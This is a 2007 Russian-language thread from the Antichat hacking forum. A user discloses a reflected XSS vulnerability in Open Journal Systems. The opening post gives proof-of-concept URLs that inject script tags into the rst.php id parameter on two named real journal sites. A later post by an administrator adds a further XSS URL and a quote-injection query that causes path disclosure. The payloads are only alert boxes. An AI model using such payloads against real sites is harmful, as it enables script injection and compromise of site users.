HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Xss в Ojs
   
Закрытая тема
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

Xss в Ojs
  #1  
Старый 24.03.2007, 20:37
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию Xss в Ojs
я нашёл ещё 1 уязвимость в паблик скрипте - которой нету в паблике(уязвимости )
итак, на этот раз это XSS присутствует в журналах
Open Journal Systems - версию определить неудалось, предполагается что во всех ныне используемых.
http://pkp.sfu.ca/?q=ojs - сайт разработчика


Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки данных в адресной строке.Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценарий в браузере жертвы.

Способ устранения уязвимости не известен в настоящее время.

примеры:

Код:
http://ejournals.library.vanderbilt.edu/ameriquests/rst/rst.php?op=capture_cite&id=21%22%3E%3Cscript%3Ealert(99)%3C/script%3E
и
Код:
http://jqstudies.oise.utoronto.ca/journal/rst/rst.php?op=capture_cite&id=21%22%3E%3Cscript%3Ealert(99)%3C/script%3E
т.е. мы подставляем сразу после id=**свой скрипт и всё
Последний раз редактировалось \6/; 24.03.2007 в 21:11..
 

  #2  
Старый 24.03.2007, 21:10
D=P=CH= MOD=
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
Провел на форуме:
3811682

Репутация: 641
По умолчанию
Цитата:
Способ устранения уязвимости не известен в настоящее время.
=) поставить фильтры на эти параметры да и все)
Цитата:
надеюсь отдельные индивидумы увидят что я достаточно активен на форуме!
Ты думаеш после таких вы*бонов тебя возьмут?

У меня о тебе мнение сильно изменилось.
 

  #3  
Старый 24.03.2007, 21:26
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию
блин..
D=p=ch= Mod= отписал... как ко мне относяца, так и я.

а остальные странные какието констинтин - типо непонравилось? ээ.. так и не должно нравица просто нашёл уязвимость - выложил
 

  #4  
Старый 24.03.2007, 21:30
D=P=CH= MOD=
Постоянный
Регистрация: 15.08.2006
Сообщений: 404
Провел на форуме:
3811682

Репутация: 641
По умолчанию
Я тебе отписал, что это мое мнение.

А эту xss мог и просто выложить туда, где все их кидают и не писать, чтобы тебя заметили...

=) а первый пост, то ты отредактил))
 

  #5  
Старый 24.03.2007, 21:56
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
Провел на форуме:
1604641

Репутация: 590
По умолчанию
Обычная, обыденная Xssка которой место в топике Xss ,но за старание +))
(имхо)
 

  #6  
Старый 24.03.2007, 22:16
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию
нет, эта xсs не обыденная - она отличаеца тем, что обыденные просто на сайтах - а эта - я 1 раз нашёл и теперь если вы увидите такой двиг - то сразу сможете знать что в нём есть хсс, и где она.
 

  #7  
Старый 24.03.2007, 22:21
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
По умолчанию
молодец, +3
 

  #8  
Старый 24.03.2007, 22:26
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию
спасибо
 

  #9  
Старый 24.03.2007, 22:27
ettee
Administrator
Регистрация: 12.10.2006
Сообщений: 466
Провел на форуме:
17234747

Репутация: 5170
По умолчанию
PHP код:
target/ameriquests/viewarticle.php?id=53%22%3E%3Cscript%3Ealert(/ettee/)%3C/script%3E 
раскрытие пути
PHP код:
target/ameriquests/search.php?op=advanced_search&query=%27&query_author=&query_title=&query_date_from_month=&query_date_from_day=&query_date_from_year=&query_date_to_month=&query_date_to_day=&query_date_to_year=&query_discipline=&query_topics=&query_approach=&query_coverage=&query_type=All 
 

  #10  
Старый 24.03.2007, 22:40
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию
Цитата:
Сообщение от ettee  
PHP код:
target/ameriquests/viewarticle.php?id=53%22%3E%3Cscript%3Ealert(/ettee/)%3C/script%3E 
раскрытие пути
PHP код:
target/ameriquests/search.php?op=advanced_search&query=%27&query_author=&query_title=&query_date_from_month=&query_date_from_day=&query_date_from_year=&query_date_to_month=&query_date_to_day=&query_date_to_year=&query_discipline=&query_topics=&query_approach=&query_coverage=&query_type=All 

спасибо за дополнение.
 
Закрытая тема
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss: Cегодня и вчера. Опрос Constantine Болталка 48 07.12.2009 08:57
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
XSS worms Xex Статьи 0 02.10.2006 01:49



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.